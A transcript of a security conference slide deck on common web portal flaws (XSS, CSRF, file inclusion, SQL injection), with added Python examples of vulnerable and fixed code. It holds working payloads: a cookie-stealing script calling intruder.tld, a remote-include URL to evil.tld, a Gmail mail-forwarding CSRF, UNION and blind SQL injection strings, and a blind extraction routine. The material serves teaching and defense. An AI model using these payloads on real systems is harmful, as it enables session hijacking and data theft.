Minor Mistakes in Web
       Portals
      A Real Case Study ;-)


 Borys Łącki
 Michał Sobiegraj, CISSP



    Why is Web
    important?
M


    Web is everywhere




M




     We spend money
     We manage our finances
     We earn money
     We waste our time

M

                     Internet traffic (chart)




http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf
M





           2007:
    Web traffic has finally
      overtaken P2P


M

    Web has beaten pr0n! YAY!*




           * not supported by any research
M

                HTTP traffic breakdown




http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf
M

    Number of Internet hosts increases

         Over 60 million active hosts
                  (Netcraft)




M



    Web security in a
       nutshell

M



    Web vulnerabilities made up
    nearly half of all vulnerabilities
      discovered in 2007
                (SANS)




M


               Why?
     A really popular medium ($)
     Immature technology
     Logical errors
     Home-made solutions

M


    Phishing victims in the US


    3.6 million people lost
        $3.2 billion in total
       (Gartner, http://www.heise-online.pl/news/item/2356/)




M

    Standard Web application architecture

    Internet
      -> WWW layer (I/O filters)
      -> Application layer (business logic)
      -> Database server

M

                                    Wrong!

    Internet
      -> WWW layer (I/O filters)
      -> Application layer (business logic)
      -> Database server

    New functionality bolted on beside the application layer: reachable
    from the Internet and talking to the database without passing through
    the WWW layer's I/O filters


M
Application Firewall vs. Proper
     architecture, coding and SDLC

    Internet
      -> Web Application Firewall
      -> WWW layer (I/O filters)
      -> Application layer (business logic)
      -> Database server

    The WAF now sits in front of everything, but the new functionality
    still hangs beside the application layer, outside the WWW layer's
    own I/O filters


M

                            The right approach

    Internet
      -> Web Application Firewall
      -> WWW layer (I/O filters)
      -> Application layer (business logic), with the new functionality
         inside it, behind the same I/O filters
      -> Database server


M


    Most popular attacks
     PHP Remote File Include
     SQL Injection
     Cross-Site Scripting
     Cross-Site Request Forgery
        (SANS Top-20 2007 Security Risks, 2007 Annual Update)

M



    Information
     disclosure

B





    A funny story ;-)



B





    More pics hmm…
B





B





    :-D
B



    Downloaded…




B




    Connecting…




B





    PWND ;-)
B

    Conclusion?

    Staying secure requires
    a specific mindset
    (Paranoia? ;-)
B


                             Client side
                           access control

     It's possible to bypass the interface
     (unlike in ATMs)

               Does not work!
B

    Client side access control
        RSS feed name based on user ID (predictable, so every feed can be walked):
        server.tld/rss/100_rss.xml
        server.tld/rss/101_rss.xml
        server.tld/rss/102_rss.xml
       Reading other users' messages by incrementing the ID:
        server.tld/index.php?p=ok&action=msgs2&msgs_id=80
        server.tld/index.php?p=ok&action=msgs2&msgs_id=81
        server.tld/index.php?p=ok&action=msgs2&msgs_id=82


B




        Solution:

     Server side
    access control
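A server-side version of that fix, as an added example that is not code from the slides. It uses an in-memory SQLite table standing in for the portal's message store (constructed sample data; the message IDs follow the slide's msgs_id=80..82, everything else is made up). The vulnerable handler trusts msgs_id alone; the fixed one takes the owner from the session and makes the ownership check part of the query.

```python
import sqlite3


def make_message_db():
    """Constructed sample data (not the real portal): three users, one message each."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, owner_id INTEGER, body TEXT)")
    con.executemany(
        "INSERT INTO messages VALUES (?, ?, ?)",
        [(80, 100, "private message of user 100"),
         (81, 101, "private message of user 101"),
         (82, 102, "private message of user 102")],
    )
    return con


def get_message_vulnerable(con, session_user_id, msgs_id):
    """index.php?action=msgs2&msgs_id=N as on the slide: the only 'access control'
    is that the UI shows each user links to their own IDs. The server never checks
    who is asking, so session_user_id is accepted but ignored."""
    row = con.execute("SELECT body FROM messages WHERE id = ?", (msgs_id,)).fetchone()
    return row[0] if row else None


def get_message_fixed(con, session_user_id, msgs_id):
    """Server-side access control: the owner comes from the session, never from
    the request, and the ownership predicate is part of the query. A message the
    caller does not own is indistinguishable from one that does not exist."""
    row = con.execute(
        "SELECT body FROM messages WHERE id = ? AND owner_id = ?",
        (msgs_id, session_user_id),
    ).fetchone()
    return row[0] if row else None


def enumerate_messages(fetch, con, session_user_id, id_range):
    """What an intruder does with a predictable ID: walk the ID space and keep
    whatever comes back. Returns {msgs_id: body} for every readable message."""
    found = {}
    for msgs_id in id_range:
        body = fetch(con, session_user_id, msgs_id)
        if body is not None:
            found[msgs_id] = body
    return found
```

The RSS case is fixed the same way: derive the feed from the session's user ID on the server instead of publishing `<user_id>_rss.xml` as a guessable URL, or, if the feed must be fetched without a session, name it with a long random per-user token.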

B


    Cross-Site
    Scripting
      (XSS)
B

                                                         Reflected XSS

    1. Intruder sends the User a link:
       http://server/index.php?id=<script>…</script>
    2. The User's browser requests it from the Web Application (Server):
       GET /index.php?id=<script>…</script> HTTP/1.1
    3. The response reflects the parameter into the page:
       …<script>…</script>…
    4. The browser executes it: exec(…)
       Data available in the context of the User



B


        Example XSS code
    document.write('<img src="http://intruder.tld/cookiemonster.gif?' + escape(document.cookie) + '">');




B

    Content alteration through
          an XSS attack




B

                 Rebranding through XSS
    http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E

    The String.fromCharCode(…) payload decodes to:
     document.getElementById("logo").innerHTML=
    "<img src='http://www.srv.tld/images/smiley.gif'>"


M

                This is how it looks in
                 the webpage code
    ...
    <div id="maincontent">
    <h2>Results for: <span style="color: #f00;"><script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,46,103,105,102,39,62,34));</script></span></h2>
    </div>
    ...

M

       The code that is to be changed

    <div id="logo">
          <div class="logolink">
          <a href="http://server.tld/">server.tld</a>
          </div>
          ...
    </div>



M

    The code in a Web browser




M

    Final outcome




M

    Rendered in a browser




M

         Content change using XSS

     Is not permanent
     Better code -> easier (sic!)

    An idea:
    A form that looks just like a
    legitimate one, but sends input
    data elsewhere -> phishing
B

     Authentication using cookies

     User -> Server:
             POST /login.php HTTP/1.1
             login=user&password=asd12ed]r3
     Server -> User:
             HTTP/1.1 200 OK
             Set-Cookie: user_id=734223s8uod42
             Welcome user
     User -> Server:
             GET /index.php HTTP/1.1
             Cookie: user_id=734223s8uod42
     Server -> User:
             Welcome user




B

    Impersonating a legitimate user

     User -> Server:
             POST /login.php HTTP/1.1
             login=user&password=asd12ed]r3
     Server -> User:
             HTTP/1.1 200 OK
             Set-Cookie: user_id=734223s8uod42
             Welcome user
     User -> Server:
             GET /index.php HTTP/1.1
             Cookie: user_id=734223s8uod42
     Server -> User:
             Welcome user

     Intruder -> Server (replaying the stolen cookie):
             GET /index.php HTTP/1.1
             Cookie: user_id=734223s8uod42
     Server -> Intruder:
             Welcome user



B

                Session cookie hijacking

    http://www.server.tld/index.php?p=comments&comments_login=smietanka%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

    document.cookie as printed by the injected script:
    PHPSESSID=gji9h519llgbgbnaqg7si0q1l0;
    __utma=258102041.949163972.1198624259.1198624259.1198624259.1;
    __utmb=258102041; __utmc=258102041;
    __utmz=258102041.1198624259.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

M






        How to send yourself a cookie?
               XMLHttpRequest
                Troublesome across domains
               Link
                img, iframe, location.href, etc.
    Example: <img
    src="http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259.1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D258102041%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29%7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29">

B

            What can we do?

     Tie a session ID to an IP address
     Require re-authentication
     Filter or sanitise input data !!!
      - White-listing (ScRipT)
      - Consistency (IDS, Firewall, App)
      - In-depth (....// -> ../, UTF-7)

B

               Attempt 1:
    http://server.tld/topics/<img src=http://www.serv.tld/images/smiley.gif>
               /
M
               Attempt 2:
    http://server.tld/topics/<img src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif>
               %2f -> /
M
               Attempt 3:
    http://server.tld/topics/<img src=http:%252f%252fwww.serv.tld%252fimages%252fsmiley.gif>
               %252f -> %2f -> /
M
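An added example, not code from the slides, of the three points made above: a single-decode blacklist filter of the kind the slides defeat with ScRipT and with %252f, a canonicalise-then-whitelist check that inspects the same bytes the last decoder in the chain will see, and output encoding at the point where the value is written into HTML. The topic-name grammar and the results-page markup are assumptions modelled on the `Results for:` snippet earlier; the bypass inputs are constructed.

```python
import html
import re
from urllib.parse import unquote


def naive_filter(value):
    """Blacklist filter as the slides defeat it: decode once, reject when the
    literal lower-case '<script' is present. Returns True when input is accepted."""
    decoded = unquote(value)
    return "<script" not in decoded


def canonicalize(value, max_rounds=5):
    """URL-decode until the string stops changing (bounded), so the check runs on
    the same bytes the last decoder in the chain will see: %252f -> %2f -> /.
    Raises if the nesting is deeper than any legitimate client would produce."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


# Whitelist grammar for a topic name (an assumption for this example).
TOPIC_RE = re.compile(r"^[A-Za-z0-9 _.-]{1,64}$")


def validate_topic(value):
    """White-listing on the canonical form: anything that is not a short token of
    known-safe characters is rejected, whatever encoding it arrived in."""
    try:
        return TOPIC_RE.match(canonicalize(value)) is not None
    except ValueError:
        return False


def render_results(topic):
    """Output encoding at the sink, the control that actually stops XSS: the value
    is escaped for the HTML text context it lands in, so even '<script>' becomes
    inert markup. Layout modelled on the slide's 'Results for:' snippet."""
    return '<h2>Results for: <span style="color: #f00;">%s</span></h2>' % html.escape(topic, quote=True)
```

The same reasoning covers the UTF-7 item: pick one character set, declare it in the response, and validate only after transcoding to it. Cookie theft in particular is also blunted by marking the session cookie HttpOnly, so `document.cookie` never sees it.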






                                                                Stored XSS

    1. Intruder registers a payload as their login:
       POST /register.php HTTP/1.1
       login=<script>…</script>&password=asd
       The Web Application (Server) stores it in the Database
    2. The User's browser requests a page that shows that login:
       GET /index.php HTTP/1.1
    3. The page is served with the payload in it:
       …<script>…</script>…
    4. The browser executes it: exec(…)
       Data available in the context of the User




B

          Stored XSS Exploitation?
     Permanent content alteration
     Easy session ID hijack
     CSRF
     XSS Proxy
     Automated worms
       - mySpace, Orkut, Nduja, Borys
    Easy ;] in web portals that allow users to publish their
    own content:
       - bidding portals, blogs, web fora, etc
B




    Session ID hijack




B

                                                            XSS Worm

    1. Intruder stores the XSS-worm code in their profile on the Web Server
    2. User_1 views the Intruder's profile:
       GET /intruder/ HTTP/1.1  ->  …<script>…</script>…  ->  exec(…)
       The worm runs as User_1 and stores its code in User_1's profile
    3. User_2 views User_1's profile:
       GET /user1/ HTTP/1.1  ->  …<script>…</script>…  ->  exec(…)
       The worm stores its code in User_2's profile
    4. … and so on for every visitor

B

              Nduja – A Cross Domain/Webmail XSS Worm

    Intruder -> E-mail -> Web Server / WebMail (Libero.it)
                  -> E-mail -> Web Server / WebMail (Tiscali.it)
                  -> E-mail -> Web Server / WebMail (Lycos.it)
                  -> E-mail -> Web Server / WebMail (Excite.com)

    The worm arrives as an e-mail, executes when it is read in one
    provider's webmail and mails itself on, hopping across domains



B

             What can we do?
     Tie a session ID to an IP address
     Require re-authentication
     Filter or sanitise input data !!!
      - White-listing (ScRipT)
      - Consistency (IDS, Firewall, App)
      - In-depth (.. ..// -> ../, UTF-7)
     Filter or sanitise data stored in
    and read from a database
B


       Cross-Site
    Request Forgery
         (CSRF)
B

                                                                           CSRF

    1. Intruder plants a link or image pointing at
       http://server.tld/delete.php?id=34 where the User will load it
    2. The User's browser fetches it, attaching the session cookie:
       GET /delete.php?id=34 HTTP/1.1
       Cookie: user_id=734223s8uod42
    3. Web Application (Server):
       …
       id = 34;
       delete(id);
       …
    4. Item deleted!




M

    Useful in getting to know your
       users a wee bit better…

          <img src="http://nasza-klasa.pl/invite/1?i=1">
          (/var/log/apache/fbi_cia_what-not_access.log)

B

    Gmail message interception (CSRF)

http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter

     Everyone (well almost) has a Gmail account!

        (Domain hijack: www.davidairey.co.uk)

B

                 What can we do?
     POST instead of GET
       not very bullet-proof: iframe, javascript
     Referer header check
       not very bullet-proof either: proxy, browsers, header
      alteration
     Additional temporary ID
     User ID tied to a long unpredictable key
       ID-key association held on the server side
     Re-authentication before sensitive operations
     Vulnerability-free code!!!
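An added example, not the slides' code, of the "long unpredictable key held on the server side" item: a per-session token that the legitimate delete form carries and that a forged request from another origin cannot know. The Session class and the item store are constructed stand-ins; the item ID 34 and the session cookie value follow the slide.

```python
import hmac
import secrets


class Session:
    """Server-side session record (constructed stand-in for whatever the portal
    keeps behind its user_id cookie)."""

    def __init__(self, user_id):
        self.user_id = user_id
        # The long unpredictable key: generated server-side, never derivable
        # from the cookie, and only readable by pages served from our origin.
        self.csrf_token = secrets.token_urlsafe(32)


def render_delete_form(session, item_id):
    """The legitimate UI embeds the token; an intruder's page on another origin
    cannot read it, so it cannot reproduce this form's POST body."""
    return (
        '<form method="POST" action="/delete.php">'
        '<input type="hidden" name="id" value="%d">'
        '<input type="hidden" name="csrf_token" value="%s">'
        '<input type="submit" value="Delete"></form>' % (item_id, session.csrf_token)
    )


def delete_vulnerable(items, session, method, params):
    """delete.php?id=34 as on the slide: any request that carries the session
    cookie is trusted, including a GET triggered by an <img> on a foreign page."""
    items.discard(int(params["id"]))
    return True


def delete_fixed(items, session, method, params):
    """State changes only via POST, and only with a token equal to the session's.
    compare_digest keeps the comparison constant-time so the token does not leak
    through timing."""
    if method != "POST":
        return False
    token = params.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return False
    items.discard(int(params["id"]))
    return True
```

The "additional temporary ID" item is the stricter variant of the same idea: rotate the token per form render instead of per session. The Referer check from the slide can be layered on top, but with proxies stripping the header it cannot be the only control.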

B




    PHP File Include

B

                    Local file include
 Local file snoop (configs)
 Arbitrary code execution
    (if file upload to the server is permitted)
 Access to source code
                      <?php
                      if(file_exists("includes/$page.inc")) {
                        include "includes/$page.inc";
                      } else {
                        echo "In construction!<BR>";
                      }

http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/public_html/.htpasswd%00
B

                   Remote file include
                            (Arbitrary code execution)

    <?php
    include($mosConfig_absolute_path."/administrator/components/com_hashcash/config.hashcash.php");
    require_once($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php');

http://server.tld/components/com_hashcash/server.php?mosConfig_absolute_path=http://evil.tld/evil.txt?

    RFI probes recorded in an access log:
    access_log:62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] "GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.803"

    access_log:168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] "GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.76"
B

              What can we do?
     Harden the application server (e.g. in php.ini)
       allow_url_fopen = Off
       allow_url_include = Off
       register_globals = Off
       safe_mode = On
       safe_mode_gid = Off
       display_errors = Off
       log_errors = On
       error_log = /var/log/httpd/php_error.log
       disable_functions = system, shell_exec, exec, passthru
       (safe_mode and register_globals were deprecated in PHP 5.3 and
       removed in 5.4; on newer PHP the remaining directives and the
       code itself have to carry the load)

     Watch out for some special characters (null
     byte, etc)
     Filter and sanitise (../, UTF, etc)
     WAFs: mod_security, Suhosin PHP
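An added example, not from the slides, of the path handling that the p.php?page= code lacks. The includes/<page>.inc layout is taken from the slide; the include directory and the page list are assumptions. The first function reproduces what the old PHP did with the %00 in the slide's URL, the second is a contained resolver for when pages live in a tree, the third is the whitelist that makes the whole question moot.

```python
import os
import re

INCLUDE_BASE = "includes"                  # assumed layout from the slide: includes/<page>.inc
KNOWN_PAGES = ("home", "news", "contact")  # assumed page list for the whitelist variant
PAGE_RE = re.compile(r"^[A-Za-z0-9_./-]{1,64}$")


def vulnerable_include_path(page):
    """What  include "includes/$page.inc"  actually opened on PHP before 5.3.4: the
    C-level open() stops at the first NUL byte, so the appended ".inc" is silently
    dropped and any file becomes reachable. (PHP 5.3.4+ refuses paths with NUL.)"""
    path = "includes/%s.inc" % page
    return path.split("\x00", 1)[0]


def safe_include_path(page, base=INCLUDE_BASE):
    """Contained resolver: reject NUL and every character outside a small grammar
    (which also kills 'http://evil.tld/...' before it is ever treated as a path),
    then canonicalise with realpath and insist the result stays under base.
    realpath also follows symlinks, so a link planted inside base cannot escape."""
    if "\x00" in page or PAGE_RE.match(page) is None:
        return None
    real_base = os.path.realpath(base)
    real = os.path.realpath(os.path.join(base, page + ".inc"))
    if not real.startswith(real_base + os.sep):
        return None
    return real


def whitelisted_include_path(page, base=INCLUDE_BASE):
    """The simplest correct answer when the set of pages is known: the request only
    selects among names the application defined; nothing from it is ever joined."""
    if page not in KNOWN_PAGES:
        return None
    return os.path.join(base, page + ".inc")
```

Note that the grammar alone is not enough for the tree case: `../etc/passwd` passes the regular expression and is only caught by the realpath containment check, which is why both steps are kept.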
B




    SQL Injection

M

                                                               SQL Injection

    1. Intruder -> Web Application (Server):
       GET /login.php HTTP/1.1
       login=admin&password=1' or 1='1
    2. The application builds and runs against the Database:
       select * from users where login='admin' and pass='1' or 1='1'
       (and binds tighter than or, so the trailing 1='1' makes the WHERE clause true)
    3. Server -> Intruder:
       Welcome admin!

    The vulnerable code (pseudo-PHP):
       $dane = db_exec("select * from users where login='$login' and pass='$pass'");
       if ($dane.count) {
           print("Welcome $login");
           …
       } else {
           print("Bye");
           exit(0);
       }
M
POST http://www.server.tld/index.php?p=priv HTTP/1.1

    priv_search=2e332424&cat='"1&w_city="'asd&submit=Szukaj




M
priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=1#&submit=Szukaj




M

    priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj




M

       priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj

    MySQL answers:
    The used SELECT statements
      have a different number
            of columns

M

    priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submit=Szukaj

    (18 columns match the original SELECT; @@version sits in the last one)




M

    priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submit=Szukaj

    (@@version moved to column 11, one the page actually renders)




M
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj




M
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,login,5,6,7,8,9,10,pass,12,sex,14,15,16,17,18 from users#&submit=Szukaj




M

    Some S E C R E T S slip out ;-)


          14831 users
       already registered
         (yeah, right ;-)




M
Another discovery:
                               
    There are 1836 bots :-)




M

    Blind SQL Injection




                 Registration form:
                 (the e-mail field is the injection point)


B

            Blind SQL Injection
                    (experimenting)

     '
     1' and 1='0
           -> OK
     1' or 1='1
           -> This email is already registered. You
              need to pick another one
     1' union all SELECT IF( user() like '%sig%', BENCHMARK(3000000,MD5( 'x' )),NULL)#
           -> delay, so user() == sig@...
     1' union all SELECT IF( user() like '%asd%', BENCHMARK(3000000,MD5( 'x' )),NULL)#
           -> no delay
B





    Products 1-8 of 8




B





    Product database for
     selected category is
            empty




B

               Blind SQL Injection

    • /zgoda.php?id=155765%20AND%20(select%20ascii(substring((select%20login%20from%20admini%20limit%201,1),1,1)))%3D97

    • Generalised: id=155765 AND (select ascii(substring((select
      login from admini limit ROW,1), POSITION, 1))) = ASCII_CODE
      (true when character POSITION of the login in row ROW has that
      code; 97 above is 'a')


B

    Results of a successful blind
       SQL Injection attack


     Delay
     Different content
     Error message
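The zgoda.php?id= oracle above, generalised into an extraction loop. This is an added example, not from the slides: the products table, the product id 155765, the admini table and its rows are constructed to match the slide's query shape. Instead of trying every ASCII code in turn, each character is found by binary search on "is the code greater than N", seven requests per character; SQLite's unicode(substr()) and LIMIT 1 OFFSET 1 replace MySQL's ascii(substring()) and LIMIT 1,1.

```python
import sqlite3


def make_products_db():
    """Constructed sample data: the products table the page lists from, and the
    admin table the slide reads (the login it targets is in row 2, offset 1)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (155765, 'widget');
        CREATE TABLE admini (login TEXT, pass TEXT);
        INSERT INTO admini VALUES ('root', 'x'), ('admin', 'y');
    """)
    return con


def page_vulnerable(con, id_param):
    """zgoda.php?id=...: the id is interpolated unquoted. The caller only learns
    whether the product list rendered (True) or the 'database is empty' page (False)."""
    sql = "select id, name from products where id=%s" % id_param
    return con.execute(sql).fetchone() is not None


def page_fixed(con, id_param):
    """Bound integer parameter: anything that is not a number is refused up front."""
    try:
        product_id = int(id_param)
    except ValueError:
        return False
    sql = "select id, name from products where id=?"
    return con.execute(sql, (product_id,)).fetchone() is not None


def extract_string(oracle, subquery, base_id=155765, max_len=32):
    """Boolean-based blind extraction. oracle(condition) -> bool is the page as the
    intruder sees it; subquery is SQL returning one string, e.g.
    'select login from admini limit 1 offset 1'. Each character is binary-searched
    over the ASCII range. Past the end of the string substr() is empty, unicode()
    of that is NULL, every comparison is false, the search bottoms out at 0 and
    the loop stops. Returns (string, number of requests used)."""
    result = ""
    queries = 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "%d AND (select unicode(substr((%s), %d, 1))) > %d" % (base_id, subquery, pos, mid)
            queries += 1
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result, queries
```

Forty-two requests to read a five-character login illustrates why "different content" is every bit as good an oracle as an error message, and why the page never needed to print anything from the database for the attack to work.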

B

           What can we do?

     Filter and sanitise input data
     - Characters white-listing
     - Consistency (IDS, Firewall,
        Application, Database)
     Do not trust user-side filters
        (selection lists, JavaScript, etc)

M




    Conclusion

M

         Web application security is bad




    Vulnerability-causing mistakes are
              everywhere*


                 *well, almost everywhere ;-)
M

               What to do?

     Be sure to properly sanitise data
    coming from and being sent to the
                   user
          Web Application Firewall (WAF)
          IDS

                 White-listing!
M

      Be aware of potential threats


     Listen and ask
     Use professional assistance
     Perform a cost-benefit analysis

    every piece of feedback is worth listening

M

              Use proven solutions

    • Traditional coding errors got answered by
      managed code, automatic typing, GC, etc.
    • Web frameworks help maintain code quality
      in Web Applications
      – Assure code quality to some degree
      – We are not 100% safe
         » Frameworks are not mature enough
         » Not everyone knows how to use them properly
         » Sometimes expanded in a dumb way
         » Wide exploitation due to mass usage
M

                       Hardening

                Proper configuration
                     is a key!

    One application server configuration directive may
      prevent a vulnerability from being exploited

                                PHP:
                    http://www.sans.org/top20/#s1


M


           Think!
    No technical control will
    protect you from logical
             errors

M
michal@sobiegraj.com
  b.lacki@logicaltrust.net



Questions?

 
Analyzing the Performance of Mobile Web
Analyzing the Performance of Mobile WebAnalyzing the Performance of Mobile Web
Analyzing the Performance of Mobile Web
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
 
Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAs
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
Hackers Paradise SQL Injection Attacks
Hackers Paradise SQL Injection AttacksHackers Paradise SQL Injection Attacks
Hackers Paradise SQL Injection Attacks
 
[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 

More from msobiegraj

[ISSA] Zagrożenia na 2008 rok
[ISSA] Zagrożenia na 2008 rok[ISSA] Zagrożenia na 2008 rok
[ISSA] Zagrożenia na 2008 rokmsobiegraj
 
[ISSA] Web Appication Firewall
[ISSA] Web Appication Firewall[ISSA] Web Appication Firewall
[ISSA] Web Appication Firewallmsobiegraj
 
[ISSA] Incident Responce
[ISSA] Incident Responce[ISSA] Incident Responce
[ISSA] Incident Responcemsobiegraj
 
2FA w bankowosci (Bartosz Nowak)
2FA w bankowosci (Bartosz Nowak)2FA w bankowosci (Bartosz Nowak)
2FA w bankowosci (Bartosz Nowak)msobiegraj
 
Strong Authentication (Michal Sobiegraj)
Strong Authentication (Michal Sobiegraj)Strong Authentication (Michal Sobiegraj)
Strong Authentication (Michal Sobiegraj)msobiegraj
 
ISSA Wroclaw -- Aktywacja
ISSA Wroclaw -- AktywacjaISSA Wroclaw -- Aktywacja
ISSA Wroclaw -- Aktywacjamsobiegraj
 
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacji
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacjiWeb Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacji
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacjimsobiegraj
 
Drobne błędy w portalach WWW -- prawdziwe studium przypadku
Drobne błędy w portalach WWW -- prawdziwe studium przypadkuDrobne błędy w portalach WWW -- prawdziwe studium przypadku
Drobne błędy w portalach WWW -- prawdziwe studium przypadkumsobiegraj
 
Technology Risk Management of Web Applications — A Case Study
Technology Risk Management of Web Applications — A Case StudyTechnology Risk Management of Web Applications — A Case Study
Technology Risk Management of Web Applications — A Case Studymsobiegraj
 
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczne
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczneJak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczne
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki ubocznemsobiegraj
 
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiem
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiemReputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiem
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiemmsobiegraj
 

More from msobiegraj (12)

[ISSA] Zagrożenia na 2008 rok
[ISSA] Zagrożenia na 2008 rok[ISSA] Zagrożenia na 2008 rok
[ISSA] Zagrożenia na 2008 rok
 
[ISSA] IDS
[ISSA] IDS[ISSA] IDS
[ISSA] IDS
 
[ISSA] Web Appication Firewall
[ISSA] Web Appication Firewall[ISSA] Web Appication Firewall
[ISSA] Web Appication Firewall
 
[ISSA] Incident Responce
[ISSA] Incident Responce[ISSA] Incident Responce
[ISSA] Incident Responce
 
2FA w bankowosci (Bartosz Nowak)
2FA w bankowosci (Bartosz Nowak)2FA w bankowosci (Bartosz Nowak)
2FA w bankowosci (Bartosz Nowak)
 
Strong Authentication (Michal Sobiegraj)
Strong Authentication (Michal Sobiegraj)Strong Authentication (Michal Sobiegraj)
Strong Authentication (Michal Sobiegraj)
 
ISSA Wroclaw -- Aktywacja
ISSA Wroclaw -- AktywacjaISSA Wroclaw -- Aktywacja
ISSA Wroclaw -- Aktywacja
 
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacji
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacjiWeb Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacji
Web Application Firewall -- potrzeba,rozwiązania, kryteria ewaluacji
 
Drobne błędy w portalach WWW -- prawdziwe studium przypadku
Drobne błędy w portalach WWW -- prawdziwe studium przypadkuDrobne błędy w portalach WWW -- prawdziwe studium przypadku
Drobne błędy w portalach WWW -- prawdziwe studium przypadku
 
Technology Risk Management of Web Applications — A Case Study
Technology Risk Management of Web Applications — A Case StudyTechnology Risk Management of Web Applications — A Case Study
Technology Risk Management of Web Applications — A Case Study
 
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczne
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczneJak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczne
Jak maszyny rozpoznają ludzi? Odwrotny test Turinga i jego skutki uboczne
 
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiem
